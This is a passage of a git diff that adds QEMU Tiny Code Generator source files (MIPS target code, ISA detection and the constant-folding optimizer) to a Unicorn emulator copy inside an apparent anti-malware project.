The Linux kernel doesn't provide any information about the available + instruction set. Probe it using a signal handler. */ + +#include + +#ifndef use_movnz_instructions +bool use_movnz_instructions = false; +#endif + +#ifndef use_mips32_instructions +bool use_mips32_instructions = false; +#endif + +#ifndef use_mips32r2_instructions +bool use_mips32r2_instructions = false; +#endif + +static volatile sig_atomic_t got_sigill; + +static void sigill_handler(int signo, siginfo_t *si, void *data) +{ + /* Skip the faulty instruction */ + ucontext_t *uc = (ucontext_t *)data; + uc->uc_mcontext.pc += 4; + + got_sigill = 1; +} + +static void tcg_target_detect_isa(void) +{ + struct sigaction sa_old, sa_new; + + memset(&sa_new, 0, sizeof(sa_new)); + sa_new.sa_flags = SA_SIGINFO; + sa_new.sa_sigaction = sigill_handler; + sigaction(SIGILL, &sa_new, &sa_old); + + /* Probe for movn/movz, necessary to implement movcond. */ +#ifndef use_movnz_instructions + got_sigill = 0; + asm volatile(".set push\n" + ".set mips32\n" + "movn $zero, $zero, $zero\n" + "movz $zero, $zero, $zero\n" + ".set pop\n" + : : : ); + use_movnz_instructions = !got_sigill; +#endif + + /* Probe for MIPS32 instructions. 
As no subsetting is allowed + by the specification, it is only necessary to probe for one + of the instructions. */ +#ifndef use_mips32_instructions + got_sigill = 0; + asm volatile(".set push\n" + ".set mips32\n" + "mul $zero, $zero\n" + ".set pop\n" + : : : ); + use_mips32_instructions = !got_sigill; +#endif + + /* Probe for MIPS32r2 instructions if MIPS32 instructions are + available. As no subsetting is allowed by the specification, + it is only necessary to probe for one of the instructions. */ +#ifndef use_mips32r2_instructions + if (use_mips32_instructions) { + got_sigill = 0; + asm volatile(".set push\n" + ".set mips32r2\n" + "seb $zero, $zero\n" + ".set pop\n" + : : : ); + use_mips32r2_instructions = !got_sigill; + } +#endif + + sigaction(SIGILL, &sa_old, NULL); +} + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int i, frame_size; + + /* reserve some stack space, also for TCG temps. */ + frame_size = ARRAY_SIZE(tcg_target_callee_save_regs) * 4 + + TCG_STATIC_CALL_ARGS_SIZE + + CPU_TEMP_BUF_NLONGS * sizeof(long); + frame_size = (frame_size + TCG_TARGET_STACK_ALIGN - 1) & + ~(TCG_TARGET_STACK_ALIGN - 1); + tcg_set_frame(s, TCG_REG_SP, ARRAY_SIZE(tcg_target_callee_save_regs) * 4 + + TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + /* TB prologue */ + tcg_out_addi(s, TCG_REG_SP, -frame_size); + for(i = 0 ; i < ARRAY_SIZE(tcg_target_callee_save_regs) ; i++) { + tcg_out_st(s, TCG_TYPE_I32, tcg_target_callee_save_regs[i], + TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE + i * 4); + } + + /* Call generated code */ + tcg_out_opc_reg(s, OPC_JR, 0, tcg_target_call_iarg_regs[1], 0); + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tb_ret_addr = s->code_ptr; + + /* TB epilogue */ + for(i = 0 ; i < ARRAY_SIZE(tcg_target_callee_save_regs) ; i++) { + tcg_out_ld(s, TCG_TYPE_I32, tcg_target_callee_save_regs[i], + TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE + i * 4); + } + + 
tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); + tcg_out_addi(s, TCG_REG_SP, frame_size); +} + +static void tcg_target_init(TCGContext *s) +{ + tcg_target_detect_isa(); + tcg_regset_set(s->tcg_target_available_regs[TCG_TYPE_I32], 0xffffffff); + tcg_regset_set(s->tcg_target_call_clobber_regs, + (1 << TCG_REG_V0) | + (1 << TCG_REG_V1) | + (1 << TCG_REG_A0) | + (1 << TCG_REG_A1) | + (1 << TCG_REG_A2) | + (1 << TCG_REG_A3) | + (1 << TCG_REG_T0) | + (1 << TCG_REG_T1) | + (1 << TCG_REG_T2) | + (1 << TCG_REG_T3) | + (1 << TCG_REG_T4) | + (1 << TCG_REG_T5) | + (1 << TCG_REG_T6) | + (1 << TCG_REG_T7) | + (1 << TCG_REG_T8) | + (1 << TCG_REG_T9)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_ZERO); /* zero register */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_K0); /* kernel use only */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_K1); /* kernel use only */ + tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_TMP1); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_RA); /* return address */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); /* stack pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_GP); /* global pointer */ + + tcg_add_target_add_op_defs(s, mips_op_defs); +} + +void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + uint32_t *ptr = (uint32_t *)jmp_addr; + *ptr = deposit32(*ptr, 0, 26, addr >> 2); + flush_icache_range(jmp_addr, jmp_addr + 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.h new file mode 100644 index 0000000..c88a1c9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.h @@ -0,0 +1,137 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008-2009 Arnaud Patard + * Copyright (c) 2009 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + 
* + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#ifndef TCG_TARGET_MIPS +#define TCG_TARGET_MIPS 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 4 +#define TCG_TARGET_NB_REGS 32 + +typedef enum { + TCG_REG_ZERO = 0, + TCG_REG_AT, + TCG_REG_V0, + TCG_REG_V1, + TCG_REG_A0, + TCG_REG_A1, + TCG_REG_A2, + TCG_REG_A3, + TCG_REG_T0, + TCG_REG_T1, + TCG_REG_T2, + TCG_REG_T3, + TCG_REG_T4, + TCG_REG_T5, + TCG_REG_T6, + TCG_REG_T7, + TCG_REG_S0, + TCG_REG_S1, + TCG_REG_S2, + TCG_REG_S3, + TCG_REG_S4, + TCG_REG_S5, + TCG_REG_S6, + TCG_REG_S7, + TCG_REG_T8, + TCG_REG_T9, + TCG_REG_K0, + TCG_REG_K1, + TCG_REG_GP, + TCG_REG_SP, + TCG_REG_S8, + TCG_REG_RA, + + TCG_REG_CALL_STACK = TCG_REG_SP, + TCG_AREG0 = TCG_REG_S0, +} TCGReg; + +/* used for function call generation */ +#define TCG_TARGET_STACK_ALIGN 8 +#define TCG_TARGET_CALL_STACK_OFFSET 16 +#define TCG_TARGET_CALL_ALIGN_ARGS 1 + +/* MOVN/MOVZ instructions detection */ +#if (defined(__mips_isa_rev) && (__mips_isa_rev >= 1)) || \ + defined(_MIPS_ARCH_LOONGSON2E) || defined(_MIPS_ARCH_LOONGSON2F) || \ + defined(_MIPS_ARCH_MIPS4) +#define use_movnz_instructions 1 +#else +extern bool use_movnz_instructions; +#endif + +/* MIPS32 instruction set detection */ +#if defined(__mips_isa_rev) && (__mips_isa_rev >= 1) +#define use_mips32_instructions 1 +#else +extern bool use_mips32_instructions; +#endif + +/* MIPS32R2 instruction set detection */ +#if defined(__mips_isa_rev) && (__mips_isa_rev >= 2) +#define use_mips32r2_instructions 1 +#else +extern bool use_mips32r2_instructions; +#endif + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_nor_i32 1 +#define TCG_TARGET_HAS_andc_i32 0 +#define TCG_TARGET_HAS_orc_i32 0 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_mulu2_i32 1 +#define TCG_TARGET_HAS_muls2_i32 1 +#define TCG_TARGET_HAS_muluh_i32 1 +#define TCG_TARGET_HAS_mulsh_i32 1 + +/* optional instructions detected at runtime */ 
+#define TCG_TARGET_HAS_movcond_i32 use_movnz_instructions +#define TCG_TARGET_HAS_bswap16_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_bswap32_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_deposit_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_ext8s_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_ext16s_i32 use_mips32r2_instructions +#define TCG_TARGET_HAS_rot_i32 use_mips32r2_instructions + +/* optional instructions automatically implemented */ +#define TCG_TARGET_HAS_neg_i32 0 /* sub rd, zero, rt */ +#define TCG_TARGET_HAS_ext8u_i32 0 /* andi rt, rs, 0xff */ +#define TCG_TARGET_HAS_ext16u_i32 0 /* andi rt, rs, 0xffff */ + +#ifdef __OpenBSD__ +#include +#else +#include +#endif + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + cacheflush ((void *)start, stop-start, ICACHE); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/optimize.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/optimize.c new file mode 100644 index 0000000..8693ebf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/optimize.c @@ -0,0 +1,1405 @@ +/* + * Optimizations for Tiny Code Generator for QEMU + * + * Copyright (c) 2010 Samsung Electronics. + * Contributed by Kirill Batuzov + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. 
+ * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "config.h" + +#include +#include + +#include "qemu-common.h" +#include "tcg-op.h" + +#define CASE_OP_32_64(x) \ + glue(glue(case INDEX_op_, x), _i32): \ + glue(glue(case INDEX_op_, x), _i64) + +/* Reset TEMP's state to TCG_TEMP_UNDEF. If TEMP only had one copy, remove + the copy flag from the left temp. */ +static void reset_temp(TCGContext *s, TCGArg temp) +{ + struct tcg_temp_info *temps = s->temps2; + + if (temps[temp].state == TCG_TEMP_COPY) { + if (temps[temp].prev_copy == temps[temp].next_copy) { + temps[temps[temp].next_copy].state = TCG_TEMP_UNDEF; + } else { + temps[temps[temp].next_copy].prev_copy = temps[temp].prev_copy; + temps[temps[temp].prev_copy].next_copy = temps[temp].next_copy; + } + } + temps[temp].state = TCG_TEMP_UNDEF; + temps[temp].mask = -1; +} + +/* Reset all temporaries, given that there are NB_TEMPS of them. */ +static void reset_all_temps(TCGContext *s, int nb_temps) +{ + struct tcg_temp_info *temps = s->temps2; + int i; + + for (i = 0; i < nb_temps; i++) { + temps[i].state = TCG_TEMP_UNDEF; + temps[i].mask = -1; + } +} + +static int op_bits(TCGContext *s, TCGOpcode op) +{ + const TCGOpDef *def = &s->tcg_op_defs[op]; + return def->flags & TCG_OPF_64BIT ? 
64 : 32; +} + +static TCGOpcode op_to_mov(TCGContext *s, TCGOpcode op) +{ + switch (op_bits(s, op)) { + case 32: + return INDEX_op_mov_i32; + case 64: + return INDEX_op_mov_i64; + default: + fprintf(stderr, "op_to_mov: unexpected return value of " + "function op_bits.\n"); + tcg_abort(); + } +} + +static TCGOpcode op_to_movi(TCGContext *s, TCGOpcode op) +{ + switch (op_bits(s, op)) { + case 32: + return INDEX_op_movi_i32; + case 64: + return INDEX_op_movi_i64; + default: + fprintf(stderr, "op_to_movi: unexpected return value of " + "function op_bits.\n"); + tcg_abort(); + } +} + +static TCGArg find_better_copy(TCGContext *s, TCGArg temp) +{ + struct tcg_temp_info *temps = s->temps2; + TCGArg i; + + /* If this is already a global, we can't do better. */ + if (temp < (unsigned int)s->nb_globals) { + return temp; + } + + /* Search for a global first. */ + for (i = temps[temp].next_copy ; i != temp ; i = temps[i].next_copy) { + if (i < (unsigned int)s->nb_globals) { + return i; + } + } + + /* If it is a temp, search for a temp local. */ + if (!s->temps[temp].temp_local) { + for (i = temps[temp].next_copy ; i != temp ; i = temps[i].next_copy) { + if (s->temps[i].temp_local) { + return i; + } + } + } + + /* Failure to find a better representation, return the same temp. 
*/ + return temp; +} + +static bool temps_are_copies(TCGContext *s, TCGArg arg1, TCGArg arg2) +{ + struct tcg_temp_info *temps = s->temps2; + TCGArg i; + + if (arg1 == arg2) { + return true; + } + + if (temps[arg1].state != TCG_TEMP_COPY + || temps[arg2].state != TCG_TEMP_COPY) { + return false; + } + + for (i = temps[arg1].next_copy ; i != arg1 ; i = temps[i].next_copy) { + if (i == arg2) { + return true; + } + } + + return false; +} + +static void tcg_opt_gen_mov(TCGContext *s, int op_index, TCGArg *gen_args, + TCGOpcode old_op, TCGArg dst, TCGArg src) +{ + struct tcg_temp_info *temps = s->temps2; + TCGOpcode new_op = op_to_mov(s, old_op); + tcg_target_ulong mask; + + s->gen_opc_buf[op_index] = new_op; + + reset_temp(s, dst); + mask = temps[src].mask; + if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_mov_i32) { + /* High bits of the destination are now garbage. */ + mask |= ~0xffffffffull; + } + temps[dst].mask = mask; + + assert(temps[src].state != TCG_TEMP_CONST); + + if (s->temps[src].type == s->temps[dst].type) { + if (temps[src].state != TCG_TEMP_COPY) { + temps[src].state = TCG_TEMP_COPY; + temps[src].next_copy = src; + temps[src].prev_copy = src; + } + temps[dst].state = TCG_TEMP_COPY; + temps[dst].next_copy = temps[src].next_copy; + temps[dst].prev_copy = src; + temps[temps[dst].next_copy].prev_copy = dst; + temps[src].next_copy = dst; + } + + gen_args[0] = dst; + gen_args[1] = src; +} + +static void tcg_opt_gen_movi(TCGContext *s, int op_index, TCGArg *gen_args, + TCGOpcode old_op, TCGArg dst, TCGArg val) +{ + struct tcg_temp_info *temps = s->temps2; + TCGOpcode new_op = op_to_movi(s, old_op); + tcg_target_ulong mask; + + s->gen_opc_buf[op_index] = new_op; + + reset_temp(s, dst); + temps[dst].state = TCG_TEMP_CONST; + temps[dst].val = val; + mask = val; + if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_mov_i32) { + /* High bits of the destination are now garbage. 
*/ + mask |= ~0xffffffffull; + } + temps[dst].mask = mask; + + gen_args[0] = dst; + gen_args[1] = val; +} + +static TCGArg do_constant_folding_2(TCGOpcode op, TCGArg x, TCGArg y) +{ + uint64_t l64, h64; + + switch (op) { + CASE_OP_32_64(add): + return x + y; + + CASE_OP_32_64(sub): + return x - y; + + CASE_OP_32_64(mul): + return x * y; + + CASE_OP_32_64(and): + return x & y; + + CASE_OP_32_64(or): + return x | y; + + CASE_OP_32_64(xor): + return x ^ y; + + case INDEX_op_shl_i32: + return (uint32_t)x << (y & 31); + + case INDEX_op_shl_i64: + return (uint64_t)x << (y & 63); + + case INDEX_op_shr_i32: + return (uint32_t)x >> (y & 31); + + case INDEX_op_trunc_shr_i32: + case INDEX_op_shr_i64: + return (uint64_t)x >> (y & 63); + + case INDEX_op_sar_i32: + return (int32_t)x >> (y & 31); + + case INDEX_op_sar_i64: + return (int64_t)x >> (y & 63); + + case INDEX_op_rotr_i32: + return ror32(x, y & 31); + + case INDEX_op_rotr_i64: + return (TCGArg)ror64(x, y & 63); + + case INDEX_op_rotl_i32: + return rol32(x, y & 31); + + case INDEX_op_rotl_i64: + return (TCGArg)rol64(x, y & 63); + + CASE_OP_32_64(not): + return ~x; + + CASE_OP_32_64(neg): + return 0-x; + + CASE_OP_32_64(andc): + return x & ~y; + + CASE_OP_32_64(orc): + return x | ~y; + + CASE_OP_32_64(eqv): + return ~(x ^ y); + + CASE_OP_32_64(nand): + return ~(x & y); + + CASE_OP_32_64(nor): + return ~(x | y); + + CASE_OP_32_64(ext8s): + return (int8_t)x; + + CASE_OP_32_64(ext16s): + return (int16_t)x; + + CASE_OP_32_64(ext8u): + return (uint8_t)x; + + CASE_OP_32_64(ext16u): + return (uint16_t)x; + + case INDEX_op_ext32s_i64: + return (int32_t)x; + + case INDEX_op_ext32u_i64: + return (uint32_t)x; + + case INDEX_op_muluh_i32: + return ((uint64_t)(uint32_t)x * (uint32_t)y) >> 32; + case INDEX_op_mulsh_i32: + return ((int64_t)(int32_t)x * (int32_t)y) >> 32; + + case INDEX_op_muluh_i64: + mulu64(&l64, &h64, x, y); + return (TCGArg)h64; + case INDEX_op_mulsh_i64: + muls64(&l64, &h64, x, y); + return (TCGArg)h64; + + case 
INDEX_op_div_i32: + /* Avoid crashing on divide by zero, otherwise undefined. */ + return (int32_t)x / ((int32_t)y ? (int32_t)y : 1); + case INDEX_op_divu_i32: + return (uint32_t)x / ((uint32_t)y ? (uint32_t)y : 1); + case INDEX_op_div_i64: + return (int64_t)x / ((int64_t)y ? (int64_t)y : 1); + case INDEX_op_divu_i64: + return (uint64_t)x / ((uint64_t)y ? (uint64_t)y : 1); + + case INDEX_op_rem_i32: + return (int32_t)x % ((int32_t)y ? (int32_t)y : 1); + case INDEX_op_remu_i32: + return (uint32_t)x % ((uint32_t)y ? (uint32_t)y : 1); + case INDEX_op_rem_i64: + return (int64_t)x % ((int64_t)y ? (int64_t)y : 1); + case INDEX_op_remu_i64: + return (uint64_t)x % ((uint64_t)y ? (uint64_t)y : 1); + + default: + fprintf(stderr, + "Unrecognized operation %d in do_constant_folding.\n", op); + tcg_abort(); + } +} + +static TCGArg do_constant_folding(TCGContext *s, TCGOpcode op, TCGArg x, TCGArg y) +{ + TCGArg res = do_constant_folding_2(op, x, y); + if (op_bits(s, op) == 32) { + res &= 0xffffffff; + } + return res; +} + +static bool do_constant_folding_cond_32(uint32_t x, uint32_t y, TCGCond c) +{ + switch (c) { + case TCG_COND_EQ: + return x == y; + case TCG_COND_NE: + return x != y; + case TCG_COND_LT: + return (int32_t)x < (int32_t)y; + case TCG_COND_GE: + return (int32_t)x >= (int32_t)y; + case TCG_COND_LE: + return (int32_t)x <= (int32_t)y; + case TCG_COND_GT: + return (int32_t)x > (int32_t)y; + case TCG_COND_LTU: + return x < y; + case TCG_COND_GEU: + return x >= y; + case TCG_COND_LEU: + return x <= y; + case TCG_COND_GTU: + return x > y; + default: + tcg_abort(); + } +} + +static bool do_constant_folding_cond_64(uint64_t x, uint64_t y, TCGCond c) +{ + switch (c) { + case TCG_COND_EQ: + return x == y; + case TCG_COND_NE: + return x != y; + case TCG_COND_LT: + return (int64_t)x < (int64_t)y; + case TCG_COND_GE: + return (int64_t)x >= (int64_t)y; + case TCG_COND_LE: + return (int64_t)x <= (int64_t)y; + case TCG_COND_GT: + return (int64_t)x > (int64_t)y; + case 
TCG_COND_LTU: + return x < y; + case TCG_COND_GEU: + return x >= y; + case TCG_COND_LEU: + return x <= y; + case TCG_COND_GTU: + return x > y; + default: + tcg_abort(); + } +} + +static bool do_constant_folding_cond_eq(TCGCond c) +{ + switch (c) { + case TCG_COND_GT: + case TCG_COND_LTU: + case TCG_COND_LT: + case TCG_COND_GTU: + case TCG_COND_NE: + return 0; + case TCG_COND_GE: + case TCG_COND_GEU: + case TCG_COND_LE: + case TCG_COND_LEU: + case TCG_COND_EQ: + return 1; + default: + tcg_abort(); + } +} + +/* Return 2 if the condition can't be simplified, and the result + of the condition (0 or 1) if it can */ +static TCGArg do_constant_folding_cond(TCGContext *s, TCGOpcode op, TCGArg x, + TCGArg y, TCGCond c) +{ + struct tcg_temp_info *temps = s->temps2; + + if (temps[x].state == TCG_TEMP_CONST && temps[y].state == TCG_TEMP_CONST) { + switch (op_bits(s, op)) { + case 32: + return do_constant_folding_cond_32(temps[x].val, temps[y].val, c); + case 64: + return do_constant_folding_cond_64(temps[x].val, temps[y].val, c); + default: + tcg_abort(); + } + } else if (temps_are_copies(s, x, y)) { + return do_constant_folding_cond_eq(c); + } else if (temps[y].state == TCG_TEMP_CONST && temps[y].val == 0) { + switch (c) { + case TCG_COND_LTU: + return 0; + case TCG_COND_GEU: + return 1; + default: + return 2; + } + } else { + return 2; + } +} + +/* Return 2 if the condition can't be simplified, and the result + of the condition (0 or 1) if it can */ +static TCGArg do_constant_folding_cond2(TCGContext *s, TCGArg *p1, TCGArg *p2, TCGCond c) +{ + struct tcg_temp_info *temps = s->temps2; + + TCGArg al = p1[0], ah = p1[1]; + TCGArg bl = p2[0], bh = p2[1]; + + if (temps[bl].state == TCG_TEMP_CONST + && temps[bh].state == TCG_TEMP_CONST) { + uint64_t b = ((uint64_t)temps[bh].val << 32) | (uint32_t)temps[bl].val; + + if (temps[al].state == TCG_TEMP_CONST + && temps[ah].state == TCG_TEMP_CONST) { + uint64_t a; + a = ((uint64_t)temps[ah].val << 32) | (uint32_t)temps[al].val; + return 
do_constant_folding_cond_64(a, b, c); + } + if (b == 0) { + switch (c) { + case TCG_COND_LTU: + return 0; + case TCG_COND_GEU: + return 1; + default: + break; + } + } + } + if (temps_are_copies(s, al, bl) && temps_are_copies(s, ah, bh)) { + return do_constant_folding_cond_eq(c); + } + return 2; +} + +static bool swap_commutative(TCGContext *s, TCGArg dest, TCGArg *p1, TCGArg *p2) +{ + struct tcg_temp_info *temps = s->temps2; + TCGArg a1 = *p1, a2 = *p2; + int sum = 0; + + sum += temps[a1].state == TCG_TEMP_CONST; + sum -= temps[a2].state == TCG_TEMP_CONST; + + /* Prefer the constant in second argument, and then the form + op a, a, b, which is better handled on non-RISC hosts. */ + if (sum > 0 || (sum == 0 && dest == a2)) { + *p1 = a2; + *p2 = a1; + return true; + } + return false; +} + +static bool swap_commutative2(TCGContext *s, TCGArg *p1, TCGArg *p2) +{ + struct tcg_temp_info *temps = s->temps2; + int sum = 0; + + sum += temps[p1[0]].state == TCG_TEMP_CONST; + sum += temps[p1[1]].state == TCG_TEMP_CONST; + sum -= temps[p2[0]].state == TCG_TEMP_CONST; + sum -= temps[p2[1]].state == TCG_TEMP_CONST; + if (sum > 0) { + TCGArg t; + t = p1[0], p1[0] = p2[0], p2[0] = t; + t = p1[1], p1[1] = p2[1], p2[1] = t; + return true; + } + return false; +} + +/* Propagate constants and copies, fold constant expressions. */ +static TCGArg *tcg_constant_folding(TCGContext *s, uint16_t *tcg_opc_ptr, + TCGArg *args, TCGOpDef *tcg_op_defs) +{ + struct tcg_temp_info *temps = s->temps2; + int nb_ops, op_index, nb_temps, nb_globals; + TCGArg *gen_args; + + /* Array VALS has an element for each temp. + If this temp holds a constant then its value is kept in VALS' element. + If this temp is a copy of other ones then the other copies are + available through the doubly linked circular list. 
*/ + + nb_temps = s->nb_temps; + nb_globals = s->nb_globals; + reset_all_temps(s, nb_temps); + + nb_ops = tcg_opc_ptr - s->gen_opc_buf; + if (nb_ops > OPC_BUF_SIZE) { + return NULL; + } + gen_args = args; + for (op_index = 0; op_index < nb_ops; op_index++) { + TCGOpcode op = s->gen_opc_buf[op_index]; + const TCGOpDef *def = &tcg_op_defs[op]; + tcg_target_ulong mask, partmask, affected; + int nb_oargs, nb_iargs, nb_args, i; + TCGArg tmp; + + if (op == INDEX_op_call) { + *gen_args++ = tmp = *args++; + nb_oargs = tmp >> 16; + nb_iargs = tmp & 0xffff; + nb_args = nb_oargs + nb_iargs + def->nb_cargs; + } else { + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + nb_args = def->nb_args; + } + + /* Do copy propagation */ + for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { + if (temps[args[i]].state == TCG_TEMP_COPY) { + args[i] = find_better_copy(s, args[i]); + } + } + + /* For commutative operations make constant second argument */ + switch (op) { + CASE_OP_32_64(add): + CASE_OP_32_64(mul): + CASE_OP_32_64(and): + CASE_OP_32_64(or): + CASE_OP_32_64(xor): + CASE_OP_32_64(eqv): + CASE_OP_32_64(nand): + CASE_OP_32_64(nor): + CASE_OP_32_64(muluh): + CASE_OP_32_64(mulsh): + swap_commutative(s, args[0], &args[1], &args[2]); + break; + CASE_OP_32_64(brcond): + if (swap_commutative(s, -1, &args[0], &args[1])) { + args[2] = tcg_swap_cond(args[2]); + } + break; + CASE_OP_32_64(setcond): + if (swap_commutative(s, args[0], &args[1], &args[2])) { + args[3] = tcg_swap_cond(args[3]); + } + break; + CASE_OP_32_64(movcond): + if (swap_commutative(s, -1, &args[1], &args[2])) { + args[5] = tcg_swap_cond(args[5]); + } + /* For movcond, we canonicalize the "false" input reg to match + the destination reg so that the tcg backend can implement + a "move if true" operation. 
*/ + if (swap_commutative(s, args[0], &args[4], &args[3])) { + args[5] = tcg_invert_cond(args[5]); + } + break; + CASE_OP_32_64(add2): + swap_commutative(s, args[0], &args[2], &args[4]); + swap_commutative(s, args[1], &args[3], &args[5]); + break; + CASE_OP_32_64(mulu2): + CASE_OP_32_64(muls2): + swap_commutative(s, args[0], &args[2], &args[3]); + break; + case INDEX_op_brcond2_i32: + if (swap_commutative2(s, &args[0], &args[2])) { + args[4] = tcg_swap_cond(args[4]); + } + break; + case INDEX_op_setcond2_i32: + if (swap_commutative2(s, &args[1], &args[3])) { + args[5] = tcg_swap_cond(args[5]); + } + break; + default: + break; + } + + /* Simplify expressions for "shift/rot r, 0, a => movi r, 0", + and "sub r, 0, a => neg r, a" case. */ + switch (op) { + CASE_OP_32_64(shl): + CASE_OP_32_64(shr): + CASE_OP_32_64(sar): + CASE_OP_32_64(rotl): + CASE_OP_32_64(rotr): + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == 0) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + args += 3; + gen_args += 2; + continue; + } + break; + CASE_OP_32_64(sub): + { + TCGOpcode neg_op; + bool have_neg; + + if (temps[args[2]].state == TCG_TEMP_CONST) { + /* Proceed with possible constant folding. 
*/ + break; + } + if (op == INDEX_op_sub_i32) { + neg_op = INDEX_op_neg_i32; + have_neg = TCG_TARGET_HAS_neg_i32; + } else { + neg_op = INDEX_op_neg_i64; + have_neg = TCG_TARGET_HAS_neg_i64; + } + if (!have_neg) { + break; + } + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == 0) { + s->gen_opc_buf[op_index] = neg_op; + reset_temp(s, args[0]); + gen_args[0] = args[0]; + gen_args[1] = args[2]; + args += 3; + gen_args += 2; + continue; + } + } + break; + CASE_OP_32_64(xor): + CASE_OP_32_64(nand): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == -1) { + i = 1; + goto try_not; + } + break; + CASE_OP_32_64(nor): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0) { + i = 1; + goto try_not; + } + break; + CASE_OP_32_64(andc): + if (temps[args[2]].state != TCG_TEMP_CONST + && temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == -1) { + i = 2; + goto try_not; + } + break; + CASE_OP_32_64(orc): + CASE_OP_32_64(eqv): + if (temps[args[2]].state != TCG_TEMP_CONST + && temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == 0) { + i = 2; + goto try_not; + } + break; + try_not: + { + TCGOpcode not_op; + bool have_not; + + if (def->flags & TCG_OPF_64BIT) { + not_op = INDEX_op_not_i64; + have_not = TCG_TARGET_HAS_not_i64; + } else { + not_op = INDEX_op_not_i32; + have_not = TCG_TARGET_HAS_not_i32; + } + if (!have_not) { + break; + } + s->gen_opc_buf[op_index] = not_op; + reset_temp(s, args[0]); + gen_args[0] = args[0]; + gen_args[1] = args[i]; + args += 3; + gen_args += 2; + continue; + } + default: + break; + } + + /* Simplify expression for "op r, a, const => mov r, a" cases */ + switch (op) { + CASE_OP_32_64(add): + CASE_OP_32_64(sub): + CASE_OP_32_64(shl): + CASE_OP_32_64(shr): + CASE_OP_32_64(sar): + CASE_OP_32_64(rotl): + CASE_OP_32_64(rotr): + CASE_OP_32_64(or): + CASE_OP_32_64(xor): + 
